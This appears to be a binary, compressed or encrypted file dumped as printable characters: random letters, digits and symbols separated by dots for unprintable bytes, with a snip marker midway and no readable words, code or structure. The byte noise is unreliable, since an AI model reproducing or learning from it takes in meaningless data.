..8.f..#.k.n.....4E.....d.6..+.......&..{).....7..G....h.;9IP>...".)A...=..h...:b...I...O...>..a....(.................z.yI ..2.q4M.:A..KO*_....i..X.4.\X..........^D....v...R.r.)QWF.ZG1....`...p>.!R;.w..Q....p.z.2..z.....p.[......q.>C.+.)S...*BP....J...~..........R%..........c..u@..Z..%.....J..3.O.."[}..)^..CC...../....zd/.. .\.?.%.V@{1.....W#@.......N..\/.X...:.O0G|...:.Q... ...:j*.F.....m[E\4b.{..|.kKK".pvk/1.T.&    .....i.>.\..f.2...<..$.7...#...TU..%.U.[."<4../..J}..x.3.u..9O....n....l.0...}.3...yd..O".4W.......w.@[..F....JQ.hm.q|;.....*...>%.^.......c.UM...i.Y1w.6..'......    v....V..U...NIv.F;A..~=y..t...}...'...w;.......<.....C....C4.I...v.....G4.s=B.m..*..`.Sn..Q..h.....O'...j...F.b8.u.<...0..3.......]..r='.Q.....=.vP...y |.M_.....F..hC..8:2S....^_.ZL.~..M.....h..(.q.n..}a..U...l.6......9.r.
.~~....M...` v...k..(.T....N...Lz|;...T.#[......n....-:....0_!.q...........>    M..cw    ..uk.bg..R.........5..%.m....)P.@*.d.. .^ee....|._;.z.Z.]d...._....i...$....p...>...^o.f..@.V..z..o...o.....f..$./..z/.5<....9M[R...h.B....WT.L.e.ze..n....6.47...i{...a.%.....Y...._..H...O.MWP!.....,.)X.....("P..........7.....................7....B..`.8C9]...|..........D8...m.Bn..;.4..#H[.^n..i...~.@a.}.....v.Y#*.....Ms2...=...;l..Y...!...d..1.[...<.f.`i..F...<...f..+.`.....t.K`5....n..
...~..+W..e.]....&...Q"..........Q.7_4P..m;UL.<......./$...^...1|..(.J.y...........?!..\....Lg...........xT...d.zx"._6Q.....O...hv....0..T.{.o..%..b...L.v.3..*5.II.l+.+..irL.&?Iq%.W8...#=...*:.=...4..g~\.xL..l..
.g.!.dB...:K.^1........K...~.yR.D...q..... ....SM......uN
.N.g.R.(...B......1.9..V.,..c...DG.K..Q.Y.7..L.Q... ..S.P......YN8..
......?....+Z~.n......m..."..Q5.N=H.A...oz;.*.........X.[,l......T>6A..i.`y.,.2..%@.:D...).v.6~.,.-t..K<N.V...O.......e.v...p.d#.Z......;36.e<.M.R.......q....P.?n..E.wd...{..T8d._>Rh1W........Y.@......ur>...; t$..>.......b...l..PQe.$..1!.6..R.a..ryU..8...X..3......;...........=);..<..Oz.J.kB]......P.=^..F......L..l._..j..*.]9.4nN.E......0=..=....aS|..K...:..'.~..S..qZw.A..{.0y...z.c.K...E..,........f )..s.K.{..n.3x......(un.[.k..........S...    ..+..k.X...`.....G.......E.1......ri.9. j@,.......;+|^....b.e.c:.3T. .....4.'.k.z...'..]|.V;......".,q...\Q....Q...}nNsw.....C.`.<....m...J...#.q>].h:w.A..%....|.....uL....%..pW.VSn.....R\`M*m..WsX........T.o ..    ..$........S......."#x8.E...6..6...C.......u.S'fo.....|...eJ.....C.(........$i*......[e...]Z.e.. g..TfWE.i^.f..p..(....a......tp..q..D..2Aw.wN.+....r.L...Db....1..d.tl...Rf..q}.../.h,.....?...F~.........
c_{..D.............06.g..u..|.3...I...C..*...3...*...#E..N...@...~....eq....h...1f.O....k..=....R@%.6A../.~`...7U9I..p..x.%w..V..._.;I..{...4....\%....y..9.5.RV..j......{..w....\.....    ,?I.*.4t.....M.n..{.....E.'.t.g].......8.W.6.`...*....K.....9t.:.X........X.b..36AP.....4%b.Lz]...NdfvS&[..hz.(T.} .SS..1..V.UD.R...6.y7.....q...}..<..m.W...T..........REt2.....%f...4./....h..,..U....j.."=....[*.L.XAlf..@....y..8//0..)....+t....^.M.-)R.bY.a;d........R.
<.....[.....iKe..    ).8..L..0...y..Ec...7h^.Ww
2.e^...g5..mV.B...
...f....+.?.oDw;.....LqBC|>.J.ip.j.I..K..G[.k.OM*M...../=}h.kgm...[.|...F..U
R.z0.v$.#P......bu!..F...f...K...x.'...L......>...d.}{..Gh.....Y........(......t:.-bk..ZI.h:U...*i..yh.^-$)`C;."l./Gj.,..P?..f.-.vv.:..$........{.............jZe.'*....j..<...J..O....].DD..W".....m...!b.c.U...e...}o.L..Xcj....u.R.l.E..`........K.2.."z6%q....D...a.R..X....]4    ;.&.6.q'...7J..)|Q@/N.X.}r.nc..q.?@.xJ..1..5........0S4.[3.....:..@.R....K.-...x.....D=c...    B..)r.........)..-....%n..{..*...@f.*.].-}....7...R.....l.~..........`...(.$..y3."..z.H......`^........c.#]n.5RnG..Tx..`=....N...N...O,.6.uy.    e...........
..*.-..M.U7.&Q..p@Tp......... ...l..#7C..C.....M.I?P......5m....6..BRf....)h."t.ZPK..$0ZX.Jp....'~I8...k.....T.H.,...o..S...U...9...I...NS'$..:..".)O.....1_.    ...P...d.V%%pb.yZ.....3I..D+......N.xI..5.56......D|..qpB.......l&.I...?r..^W[.    J.v.L..a4Do.0{....r....rcDn....biR......^w..f..K.&.&Ct..b.i........`...'..5n/..}...t\.=....3+|....D..O.a6.]e...|...%P...]..n%.8.%.z...%..-...%h.S.Y|.?UvR'.d.m.8.b.q...1.aB...g.....B.|b"w..."........k|u\..X..l.......8.p...jC<....R?b9.6a..Z?.,.lk..1( .s..K..$..3.....@.T.A/.Od...HZ........VK..mH0.Nx..x4.q.N..........zjy..!.^...jY..s.._.x..[_.....U8..&.....S.........;..1.42.6....y..VWd`........?.....K.:.-l:...hB..=..X>.6.F.>z..q[.^.0......u..E........?.M._O...=...-q.W?w...d;.8...N.B...W.    .....&......36..I.j...%.f..'.$o.d.H.`W......2A...xO.....b..o..;.....5.i..A.v.r..+..Y8.G......'f.v.j..W.^w.......J...pgz`.......ST....|5...JK...(..*.....y....M.T.[.}..?.%8.H...=N.......M..".....ZS..M.2.A:..3...`u.`.W+...-..s...ai.....)jfD....,...R7.;s.@;j.r..{.4.0.>.b...~.WI.....,....D.9......."....c~J.....V.v.W).#..../....tI@.<.Q.'.|E.p.Z.6.C......*......8...    a...j....`..C.......wb.N..0...._z..y.foc.O......~m.<_.#[.GS...s;.Do..Z........\.....Hw;...;..................4.I,...~9.    ...8..;1.._.
H...l.rAQSmU..].sfF.!......T......j.e..]..........1...?....E.......0...hA..LG.O...)    ..+..=tx..:.....~.......R..K..~........"!............,t.Y.G.JS#a[........5!.Z.IE..M.%......1.........0..2.2.....t8.V.~......+.E..x.I.N....3Mk7...B|]._....QQ$OB............\..^.1E.v.&m.I....v.... .>....Z...1'../bhw..e..W..^.e_......[M[b0..._......\.).N.......kJ.H.P..N.h._.....O..a..Q....K..B..nE......nD.R.    p...l)..wD..Y.M.w......Vi...'./..x...'X...nh....".../S`.C.F T.n....fD.<.........d....`..s...u..<.o..`c.:B...../...i,.W.*.q.lj.D(.WxjOSH.%W.......y.!...lm.L/8...M_....w..o...Xqb.........}o%. ..3yE....`!R.....5r4A...y....H...b..]vM..->.$7..?......p;..%Y.PK..H.    d..:Qf.....8l...*....b..I.N...Y?...O#&r.....0.}....Oe#.;9C.H..%a\.....I.r...h.$6....3v....S2....o.q......@e..n4.u.&.G...*..<r........C..7......3.......}&BH...4[.a..p...=C...S.~..5.....
{.q..A........!...4"..v^...?>
,....$.W..L}..C....m..N'~^..s....j...se.c.y....c.8j.+;..........+2A7Ro..e.-..J..o...a..P..3.!9..Q...+;...__'$..............]..Aqpu{..R....u~.d.cl|.%...0tW`.`....9..%^+.?....3.[q.......;...{&.wz..D..d
...[SNIP]...
<.p....B..(.UR.!..]R;.
...<%......7.\1...
LS..P9......>.Ie(W4.;'.....+.,...}...h.L../|..H.......8.#..
...M|.V..+Y ......6.....ia=.0......\.VI    $>.p-!...z.K'jH.]....S~`...G..L.....E."....[..).u.9X.-........R`@..3....X.....E..F...H.p..uUVT"Z8..ACB......?..bc...0......R...j\w...q.........-k.4..7K".)s....&..WnE.8..5.W...5w...
.....
:.'...?..O.U...!v....p...GE...kF........7g...=...a.. ...95_.....7&....0..I...<..e..w.3.....I.X.i.?......p>Q:s.....=.I.>.s..|.S.%bC...{...)..%2.F.RT)./._.....) .(...=e.I....H...i.`..O.N._.n.sq.....i.T...^H...Z......l....p8[..w....#.1..'..l}....[.KB..V...H.@..<....qU..\...\.L.....1...p.m....6'....'R....s....zxW<.S.-...G
0%....p..l....C..c..\V`......*,..w.... .......n..p...O..[o.D......EyC[.g..f.hi..` .....\..h...s^....1...M.QxE..&.VR..{25.-j.X:.h......w.N..RlNBc.t`......G.n.]..#pr.z.)..>..G!.V..tv{...    ...{P...H.Ll.....l.f.\.<.....5.@...f...T:<.w...L...wcSL.?\.LMa.:.M..XP."w.....J.?$...|.M......~...n<6.y.u    ....S..?....D.r.k
....S.=(..........wh.8c:l6:c+...].
.O..........l.w@....<..Q..k.\.$4...0..    .,...e.d....x;.=O.D....h.Mc.....H..S.[.....m3...[.V........wJ.yJ1.G..5.m.....
.YW..j,e.3lF.}..3.....J1]V.x..&t.oU0.P.......s.#....Q).1........`AK..M../+...9.V...yf..#.h...[W...p.I4x..hY..... @.w.{|e....l\.*..H)9.p..6JMm..3.....T1..G ....U..f..z.......f7$;\....|`...S.IL..-...'U..D....8z....3$m.m.._..bN&u....T<..s.nW.0k.z-G.].....&u...$M.J\....^....v.;_.3.....&..}........N..c=...."C..)[.WH...W.._..m...y....a.rV.L.....r.a....A..\.=M..O)>...A....Z.x.$d...5|..e.^.Z.....C...$O....C....[...-..-..6r.....7
...\.M...7.........Z.............Y...r....h...j._..).... ..D..?....t..>..tP.Y..'
..1.x..S`.T&...$.h..{.
..Q.    .
.ip.........TT...}..9....X._....
.../jz.    .....M.....|Tt.oKa.....\s.'2...../2.."nP..V..`...a.^...hxnF_.gY.Pw.A8...x.<|....k7.......sH..p..[.7.2.>g..+,...Nc.......C.c..@I..\M..$W.n:o..i..81)%.....7..z../..b<....y%..hF.K|P.%^.K.h9..B\8...6.$.....6.rO...m.'...3.......}.a/6?...}...K}!/..`%p._@-!s..Q..........k..kZ...    ..t.`v....a.d.....;..3|.}....=.....\..ZQ<{....f.?..T.F..g...Y.....LTe`..vN...m..{....}.c. .....w.I".O.X.4m.!.f.55d...I.....5.n3WxYR..z.........8r.\...R....?]m...9.....D...."..?1....x2.B...IZ...........~.%....p<.7g.(.7..[..t...r....<<q.M..Y....v.......-.$.    .s...e<.1F.....&....Xn.....Y...0j&..+...V#..t.U.l....T..?.]..S...G.g._4Q}4...NC."bon>..)Xl....*..X....*Z..=].....! Me.@...
.....q.mo'M{D.'......N.u.p..T..+....99..i..f.$..P.%*....;5......fx..s8......".8T_3.|.{..._<...*c_c.NH\~......mR;..'.^..'.|....?..^.O.....z/.'~r.....c..v...p....%...[.o.a...........v~.
4...L...R.......i.1
'UE..XK.c....C........[M.1.l,'8......s..\..h..m.M:..x.T.q.G.....:....w....~s.q 'Nj.9+i.......y.@<..    ..|.....N7a.S.E....rt...........(....A..W....d8....y.."<Z._...SjA=x{.%/..IV....jaA..]...H..Ir.e8r...Z...B......e.T........:q.;.....f.I.bf...s....}........`Bi..XL5{....V._....$;g.,...1...[L._.2..Mu{...]......o.q_u4......q.;..Etk..T........Dt.....Q,..Z\..9.[....P...K    ..T........[..Qa.5+'.i.+....<:....l.
.Q..'.VRTp..~.;~.g...4...k.<......\....xK%...[d.$..Z.|...?
.2&.(+C.....EW....3.h.@...b...\.M.m.$..n..9"...N...1.k.....;r..L....ZIa~."{d~..(...!B..tEBI.Juy.1.@.7.......~.!R.Y...;...k=..)..{.2/....@..jt....L....eh.5w..Y.9(Z....$.h$S...SkT;..V.... O.-..d..k..$...Y..:$......V.q...'.B..a.....a.'.........9.u...=,...!..s...:..c.A.......{.    ...;.C58~...,/m..U2(fYL*..#.,.c.fH....v/(....,n
2...*../.......ttM..}.?........>g6........^....^o/.V|...r....g...v...6.M......C.XSE......iy......S."...zm.b...F..V..o.[.v.......b.1.y...3Y(.B..=...=..Q7.j+)...3..`.k..V.fra..Dg"..:.....HG.>r...Cr....-......u....|#.D.`...w.4........p.r.p..........a..}.3H...t.fcj.s.-..]@m...BT......W3..........%...9"|):.u.bi    m..l]..J......n..@.)9.u.[M.|...v^L.. ..>;.T.w.....a9T..m.A.Q..._ya&.T.A.{.=....h......j..v@.....Yt.....|...?.".....r....o...(    ."M..._..iZm...N.fJ.J.@,..}.v....gb..$.%?..(.....<d.in!..|{.|@Q.X.P    .....)..........v.k...k.e.i"X.wW#...O_.~...<.$......]n....[...!_)...(.0.J...C......\..[.>.}.....ep.d...v.......!.~G.$x....4.GSO.?...U..6...[..T.......2.W....C........
d0.Yp...sn.&.L>.|..&...y....>...U.E....W..].u..K.....U.4U=.$....I...N.E..e.*...6................V.#.YuRh..G..Vwr..{fp...ar.....V p...y.......16C%..D&..c..H...(....]/..^+.Ln..S....Y.0.dp.....q.B...u..V.b..T.T...^..5......(..a..V[..%..Y.u.b.AO..l..[..7.A....$......
.n....\...e2.W...!k.....tx..b.    ..#3D.N.9.X.`...z(.~.@U.[....i5..j.....}y._.y....{.....P._...._..<...C..C.d.c.m...\,S........i..........[V.B...D...v.....u...~....Q...R.....|.k...`v.k<...w..2.....    ....$.i..b.8......1..S.3....)....I.B.....v..._.PF.:/1".....b..R.8~.......e..-..|....J"-m..n.o1.....U....-P.F.f.Ux.{R.q..z
..c.E5.Z....c..-...-R.B:..Me.)P.+C.^6v>']>....&...T&...ZAJ.X..g`..u.U.;K...Pf.v.E.......;..E.E..?..nhB..P7.....-v1T..............t.....Y>.?.....=.x.qv`..JzX...
.x................d.........a.W.....*3..,_...O...G....'.d.n.Z..:.6.Q..s.~.-.a\u.........-2.L.X..........?P..........].....!...EGZ.B.b3!...CLDJ.cVV    \..;..8.F........".v..
_..uE..=..........;......6P..tb..r...Q....7.).."......f5..t..0...^Z.}.jW.C^.....I8...V..r.~..@CF.63. O..T(......0....&.A....4.]....sd....=X.3..tc..^....B.kn.bp...K.7..,.b.)#]q..~.?..2.$..~.r..$.../...$N..b$5J70...<..O.K.{p.+W..8...\p.........o....o.....L0dn.f....K    V.(.,4X+.....Dkz.*x.7...,,.hOU.....{3...+`.q........m.Q..gm...k..#.*....<.]..w.}7..f..
...e^KAL..Tt.[..7.........gzO.L.P..........7.>d...9.C.x|&.j.%o..w$.."#c.M..R..T.+. ..U....|.O+"...H    ...hlF.F.    bJ!D.B....4..{...A.nV.V>.m.........[.K.+&E...[.    ..T)?......3..#j....).....".l)*^.W.........g.:.+.e}....Z1......!hr....;......[.w.....<...R...    .KzysY".d..d.<.&.......    =w].....m.#..}.j.S..5T.Q.....Vl4.<qN....r...c...I..6/E>;....A.)o..MS.&......z....G.Z[.=8P...~..T9.Z.R..g.*..@U.Q..^4..    G...~.......]P...OW.F.;....O{....[.\cA..+@u......r./...p5.....h...3......v.........i_.'YhJ.5.W$.S......
......J.y&.65.0.........>]..t.._.PvT.%B=.....d.G.4.. ;..M..c.@e..\
.@.^~..F..W=R....$^......X..-...W28..yU.Q.z6#M{......Tq`...u...z3......g%.^d..|............_.[...Y.)...F.3...#..X....K    ED^\.u..
>3.:..=.F...Y..}.R.f...k...S../It5..G...`.......?.f.g...8W.4s.Q%.;.M@L.y.z......L@..n.-.....^Q...`.....u.&7.B<..9...>n..q!..y...-....HUyQ%t\.3|........b...`.E.me.).gC. ...s.tZ........c>...J.k*..wxW..].hx.....[>..h..(*1.P.k.D.J.R.J....dg.T.)..O.....J.RL
..).....$.Pl......vf.YR....#.Tp.............?.s...Tm.    W#v?..iJ...Y ai2.    ~....vy+. ,....N...5i..c..l..`.4P.........Q....S.d.....Gh..3\.U...l..P.P.XO.c~...
...c.$a.D.}.........|qW...I...;eCf..B.#?....)..p.P..F...j..).Q..m.d^.. }K...z.F...x.J-....Is........y./..k:..T..;cV..l..B9..0B.<.:E...g..c.{QO..#..'....m7........|.c...uY......zA...7.......%.....)....V.'..X...~....pq..On.........A....l.W....|. ...C.............-.....G..&......q.......q[....G#z-.....F..^,RM..(..F    A...?M....!..-.8.>.....e!e....=................{..mq.o`.&..Av....Gb.#.`..;'v......d}.
.Pp.F,..T.d..d.R3..    ..1..J..J+...E._D..Yb..B.....^ue..p.Iz..........P..c....n/.........mfOx27>y..-./.....TA.7.A..D.......2..i.Ca..5% n...)....
..d.$V.}....UR..MT[.S...?ET..`.4...&...........n..d.....J..5..9..H.*...]+......`.U..{%..0....9q._..RA..J.i.;.......:..%.u...a.....(.....*s........c..
....9....h.`R....M...Q..G...S..C....2}..WZ.O q.)4.;C.K&..6.!a..[.A.z......w..v..bvJ......kX.am.>C.2....vT..3..5.O...F${'......<X..D..A.C..Bi..;...Y.... .f..j.D?W.!$..9J..V......,.0.P...u&l Q.........|..a...YI.f.3R    ..x.#.,.......Aa].ikHS....e........%....J..;..:....".R..X.....q"L...|)NcA8.E.&.....u--.RG...s..B.=..2...g.$....CK;Z.|......;.....k..@..D.!vo..}^.mK.................:6...P*..d_........9..O..5#+..j..C.N.@.....9o...........6:.@.......q{..5C.x.....&^:.B..i/..p@.R#.)    .U...............N\`y..b.}..7...H..p..C.
,....".c.v.u.9:..f.{.0b.3...?T.9.rXlJ.......y..8lq.../.    km..\N....z..>...S=.....C...s......b....xi.......z..2.#.f.SKIi.qg..&OM.b.....bp....&.NFM1.L|9<.AM...8......f^...G.&`.&"...}Q..v}.5.)...=NTj.....Z.9~..t....`..r3..e].@pLS.....2.y...Hk.......F.1.I..v....j.....6..T;...h....A.y.#....e..W..;.U..P`.c.....J..<..;.C...t.j.E.........h3......^.H.........6.B.VU..-NH9\..(.....*K....:..zef....C.....Z.[..._...t..........\.C... .ZJe'.|.~/6>...N+..TY./....T:.e..$.q.f.....y#...arg..|..k.ea1.ri.....#...Gs..j.
.Ef.H.Y....G..g..4..s?..X..=@wn....U..>_....a.q    .o...."......f.9*....Od}.......U3b.......{.2..2...<K.C..A`........Ev:.g..x.............J..o..Q..'.(.    ..."...8...$.5.>.".@..........$..pR..    .*......V.Q..).0b.I.Z.\.B...U..O.%...T..Z..R...72...c!]..^..8...4S.2.8.@#.!....s...m....D;.F.....3.._(..p.6p....U.QL.0..C..L$.....DP.=3.    ...~ g...;S._..<.k...j
....-....;.B.....u`.r.....y....f.E.L.PHQ..%[P...w.....).W|M.ho.%e......Q.[..O....7.4......k..6..}.........h3.I.t.....U3.U....$..bu.Q:.*.....@...4...0....'.1s.UH.>.6N..8<l..P...j..7A^.I...F..t..Z_..[...j....} ....8..K.i.....`..t...GO.:`..... $..r.......w..^x._...p    ..f..,.)j.Y.....x}=.......Y.6.>.^.=4.u
.!.....+.~.Z;.6.`!5{;.n!...D...&..
...$......D..>ag..'.g)A.A.=G.p.t......w..s>.y.?.Be...R...~]..oF'.....!._.[.m.Z+...D.u........2
..WlF^X:...C.........Q.F.EX    ..I&#"..f../{..(_.wm.,..=.=f.........s.[....wK.0.jZQV.sP.y.t...9.#.
....\.UkTt....Y.&.D..o@...h#.C>.F..................-.]3..{iLyA....NE5.4.7...X..HI\..i..0a.... ...........qj.+.Z..`....mil'~......7....bu....?.c.pn0....rN.f.......?.....rD.
...M.#.M<.. ...Z7.+..d..O.7    ..w..K...>.
#..\.{.YxE.j.X,D...'..?.vSf6&.6..C........$.T..I.<~....!.F%v...WJ.5.
Q.....<.*H^............(..]+....\Xp...e...n...../..#..+.Z0.E.W..y3:=....A.q.?........~.PR.W..#.y....>Sj..x!.q0.....^h.]l&-).?..=a.....^LP.L.....;..gW....w...&.c......7x.../.P....}b.;}..b...c.*6....}~...A.k..G.. .....".
.........'_."vS.$..{...T....l.-.`..c.4*.....].......o........bH..P....._..p.N.m.5...{0..x....&..;`..OO....H.N....C.I^..A.......-.......M...f/...4H.o.."..6;5...T.....'5..\....8#j3..kU......&..y.......K1.v3.4.-.
..Ve...Wx..L8(.......eC.35.^G5m..G.6T....pk"...q.+..+~.N..=    ...,?c]......O.(..........N}..;..K.F3......0(/.../..c.......:..b[N\....g.=.Q~..3...=...^2.~.C........n:6..d.........Z..U1..B.P.....
;..3...9w.ji..i..C...P...!.}.T.P8..rQ/.....f.J...-...e.a.A._
T...\.....b-.e{..`..o..E.NTH.A56..........g.z...3.QtB......6..@;A;(.P...p.9...v...Nq?26.....}....:...%..M.o'm.
9s.c.I.6G.E.dd.Dx^/...LG?NS.[....Q.c.9.C4b6..c=...o.AO........z......h...........a.(..y~m0.>P..Y.........a....N.B...Wj_...n^...I...pl................,^P.*N    ....mU._.    ..C......ne..d<\:\...$2....../..o..9,am&".=../bu.u
..`.|$).....2...vK../...}U....x..C..%......Mf..EH.&U...&+.G._...a....L.UN.f...B....R.NH.....    ..?B.?/.j.-....m..(AM.G.......}.5...zN....6g........U...W....yU}.|..._..l\y..^N>.a.cB5.....0..]`..%.1.................x.1..%..\...:....*..8..%...H.vhS..:|J.s...2..9gN....b..xb.Aj.....2...D.B.|..Q0......+~..:y.DU\~..V....m....;.3..x...O0....u.r.._.g..7to...m..)....<{.......\.:..14H.    .S<...P...j*.....2.o'L....+. .~..x<h.P...^5.|Q9.T..v.5+N....9......A.T......{@..............M...e...]%..).H..:.q.U@QO..+...9p,...V......e.
.....LD..[.....Wr....@...I1...)w.V.......<.".C..[/......z....e..b....B......Kd...[.~...(.Z.2....$Fd.......    .dsw...$...4..|.......F1r.u.Wz%m.....Rv.B...,.t..<u..$.0.."s..#...[.H.S.{.....u.fuB..R............^.'...<}..#f.&.............`.5d.0.&~.87...tX....
......(...l..........`...%!t.n.3 SL.m.bc.4.EnK.......Yt..6..x....K.g..`.;.^.9t..;,.......o.....)......4..G..%I8......E#..v..KA.g8.].....0......m.O.|...^R...f<d..i..G...o...4.<F....h..}..6......^,.~.1.......@.U....p... ..../.........g.....x.Y......$%.K./.?....0...0l......o^..V ..Q?.
.N.....(...S..~&......d-....f...aydC%^...BN....!...o/...T<f.....H)..G.~o.....    .
{.t.l^....Y.g...".\..T..6F ..y+V9.-.j.....Z.O..6v.Sz...3...WP...>Q.y.+.......y..?..?@O....;6D....9...m
+.x.&.....1...z6y..@.........(O.F.......N..o..1I.|.    ...NX.. 2..Wx.o...n......%..........KD.....V.)...w.]..
+..    ...1..%...X~......v..h....}}J...ZJ.).!c....Q..6...6.T0+.R}26).19....6m}..?..k...l.c..w....I...9x....nFbm...[b!......;ox...a..nY..I.-....ue..n...................xO..[..1By..@o...h.4}...N..Ndh..X,.3d.0.9.v.../i[......}    ..i&c}.rL,........(....Fj..E.....wLY....3Q.]..../.h.!e...]S..Q.s.|....G...m..{..uY3.U..+....Z6l.9.W|g..).).....$..Bau....t.Z5....4.(...d...X.|wL..y.}^...1WDf[.........hM..A....G.5.a)`.....'n.k;..0.^.......y.*....KF.8..^.m....h9Z.."....9..P...Q.5tP[....GI.M."7.W...yb..~lw.D.......;HSL<7.V$G.E....pC..{Q.......BK.j&Y.....    .Q....F.3.r
.K..;....i.....Y....#OT.u.K..#. .*.I..........+.`n..5.2..!'
..
>pXz..o....0o!O.....Y$..y..h.<.%/f......40.M3".[9%....H...> .....    B...H9.M.....~.Cu..O(Q.c..>....^...%.....&.....f..(E..*+...~.....'.A...t...L...~_..o.m...mDiRz...J.Dz.G[}.........b8.I... =..<.D....Wd.~..j.kJl'. @!"..w.. v......f....4...>..Z..^...W...S..#.....WOx1c..}.....I.x.M.YY!w..^..Y..gF.'v.;...Mq......uEQ.W.....-5....j~. ..`fZ.................'vh:|`.7,...e..R...5+.XW..S7!..4@.t....X..I    .(W.c.v*3?.=.s..y.[tIY.
..5l.B..(..........y.......e.....o.rx..v...+a    ....E.M.<...... H..!,.}.[`....#.m.....1......n..4.,m7]*.....:|NBu.".C...G.O!.r.9........DF&..F.f..<m...)...28t24t..5.'4.B..F....Q.N.._TF.w.4.(..x...YQ.+    ...%0:....N...69j...J-.7....."...v.M...o....5.0.u.*.H...\..~8....i)....A.*....@. AYt.l......B.A.......C...L1.a..'...[.I...O.u.Hlp.".E.P....9.+.....A...%]..4...#U7..Ly.qT.BrO...g.5.q.K.ur[..P.3..B..R|8...-......m..e.....o.>.....o\D`;*..uph.x.....[-.pO..L..........A.>]..-..o:9dU....c15..*.NM...\....w.]....!.L`,ic.*..j.c."....)7... ....V........e.....[.H.6...J2...d.....t4.5..0...........Y.!{.)z..cm.D=...5..e.v.@r.{.z..    .t.w.uL0.&q.pc...1.<..."M.2.m4.y<.f..k..6..._..V.8.s.>.Z.xS.. ^67gK.....N.1.j.k.~L...    .....pR..a(.Wq...[-.6......W..+...w}9....(pz..8...q...|......8C....'...?.l!_pr.e..\......!0...E~.5...D.OD.Ln.U.f..J*...[.[6...H.......#^b.....]..).......c.#t.t
8...i.....l......2U?..{...t7(.XK......2.P-.Dq;....B.Dm.*..37...H.7..C....W...I.`...}...T.)7d.6..'..f............,..x......a.....9
.?..Q.s{.....*D.69e.....[.J&0..d..2.J.x5S...f..Y+..#.A.....7.6..Bf.V.Uh!.D.....&..h. ..Fr.m.......$|.|!5..HC..PV.....(..u.....SP.h6HO.ss.b..)..~..3R...i.B.6..s..e...Zm=........ZT....Y..H..H.0x..|Rd......'.y..../....e|....a.=.Hj..of.|.C+^.Qo).o.1.....<...v..S..Q.....dYH.^....X..W.S.c...g..s..pen........Z\.8..~C.d..n. S..+....:.."....).y..../...T....].p..c....Y....V...'. nOJ:U.....wJ....Us.Y!0G+k%i...<B.;.D........n!..9.y....U0|up1...c.$R8.uR..2..$...n...chd..6o.f.4.B...B.....r.R..$.s..:,...$............2..J...v:.....\.Bj%%.z......l.)...........,.
T.2.HM.......E/....D.....>X...3.-.r...l.+..8......w*p.........4.l....Q.M..8lr>@..h....6.P.T<m."..m.Q.+.Z.u.<.n.>..2.^...%*.D.~8....O.=..H.....\Z.\D.aPW.v...`.].?..rla....D..J.f.[.(..YC.U}...e.P.1~O.j...'..G.s+...y1fHl.....v...#Q./.h.c}r=...5j.....hN.b.K.q.Q}......^...g7.X........e...    ...3...N.h1.Yc.}\
0....(......y\..lu#.b.8...lX(.....0..=e......W...o..w..]u}..#...!U,'..[.......W..x...w...K`.>.5.O....y"..n..N.....?.6eHw......G.*X.....'.!W....[..i..#@.......3(m.98./,]..B......:_@..]...@.ytP.]...C.x.
.#-.~...F....7..u.d..6.R.Pq7..xu..mm.g........b.C1j......zcb..r.....h..b..dJ .B.    ....8Q$*<...X.P..##+e.....N.S.<...'.mM...z.....{S......../..t-QS..8..l$.%.S..1.... P.)...:    f.H....IX(.h..7..>(\mt.....E..WN..G.@.^.+.z...9.6.......Z)..'T.&NXD.L..AO.}.2dN.D......F.L.....@D........eDq..].58...M...~e..x.p..[y..-w.B.h.)..J=s...=.]m{7.@..#K:...4....by..z.Vk{...O}.q..v...._-......-.H.x...R.c..l.h.....!....7......a.-..:U.o....vK....O...e@.m......L.G.vp.F.)...3p3..:.M:u42..I..Tas.+N...Py.ay;P..C...$....\....u.H...5..,u....d.<.DG.ag..._.C...h.^LF.Mv.G.6...]..o..AF.m.0u............8..    V..Q...X.+N..u...6]E.....R....+...5)8y.`..F1*.kh.0.O...n....p\..........0f...[q.....<.8..?_.
....<.....a..s.[...N.W....s[z.o.s.,..xX..Q    l;....mo..]j.....7L^u.O2qJ.
...>\,.{...Z:...    .ze.$....F^......... K..b....L.........4.q.!.....K.h`.M>2Z8...."
g.s.Eg@.u=~.}...%U).=.z..-.....Sc...[.D.1\0.Lx....+.. dP.
...t...I....j.n..9.*.'..M.#.@$.m..Wu..\..M...o.c...Jk...y...Y.J........z...KC$..8.A.Mu.....U..U.rT....-yA.d^.&A..K...CA..B.].Z..D..X.D-..SY%..v.~.t...h.$..?..@,<.*-...#..[..]XPA...K....0...8I{\X..6.\s.#`$.&.z.x..Y......w..~..He0..Z.....l.v...:l.../..^......K6.7.........v..j[S.7Yb........;&N....).z...h.J.7..z....rR.r..7i..D.Zs.....R....j(..<.....T`.U...X..z.'..W'E..C._....c.=.X..ZQ..W.....~.)..S..a....#...c....[..3..=):..-....9(....[[.C....9....(......vOY.0.T..q.g.+...[}.Wm:....6c..X|...t.+.V.i..~dZ...;.....g...G.p..)Oc.....@k..W..)Y..9R~.f...B..[.VX......m...9v..m...5...(..C.,........,......i.54O5K....g@...R..ZP8.9P...kW(.VJ.......z.W6.?..?..-.....$..D..k.j.4,..K...<{...H..(m..-.e.'VV..Ja.........J.gcS..j...u..{.i#..U.;o)...AU.Q....../g .G...`..Y. ....[6..h..sr.O....3Y;D^l.....Er.............+g/....n_k.(.C..k...yxH..3.gcm...........Z..?o.=vXc..g...|>..%V.yN&r,..:.Y.k}~.Dz...S...>..x.9\K7....Y..U...s...q(r.......1.'o..].-.>
:.O.`t...w8tH.C.....<..l.......!...R..m..7^...-...`..RVZ.........j...7..
~....3.....    E.....e.zc.^.....'.M.T._vd$.....ES    .H;.... ..
..%...u_.....q.G...vJ._...rX.kxu..lVu$R..Ya...7.V    .....{-.....>.....m.w;..4......9.^...z..V.....a..!
.9f........P...........Y...D..0s!r.C....y{^v.,.
?.......Zx$Q.....=1....h...k..sR.&.zI....H....u..o%'N.j.7Z.....D9.&=*..@.......B..i#z..9JFiS...v.vx!..@.9...|l.....h.........    ......Q..IH..J.)..f._y.....g
...c..Y=1u+y.S...dS...\..l.lI..H.ZT.T.&5..(.ZaC!.#}.d.F.rb`....W_.N/......y..r..RL..[V...p.[...J(a2...X.:mm......P.....u....0OJ...@...3...BG.{...B..(.d~i.b ..j@...s..r:Wh.\..~.h.I.....M...,.+.ny...jq.]c.....c..J..|!'..tji.,..    .{...<.p.r;lS...>...A`.8!n .....g..n`\..xS8$....1c...p. /.S.D.L.9.k.a.Gu/u.Ux;.....8.9.&[%..;....2.C."....<Il.....w]....8%.?.L$].....{...J..bb.0..t..x..4..lm....-.A..n.Bb    ...j....".......N....+.......2..iiB....................    r...g+..9x.....^..
.gWAS."v..p_..B.4..xV;2....o......q
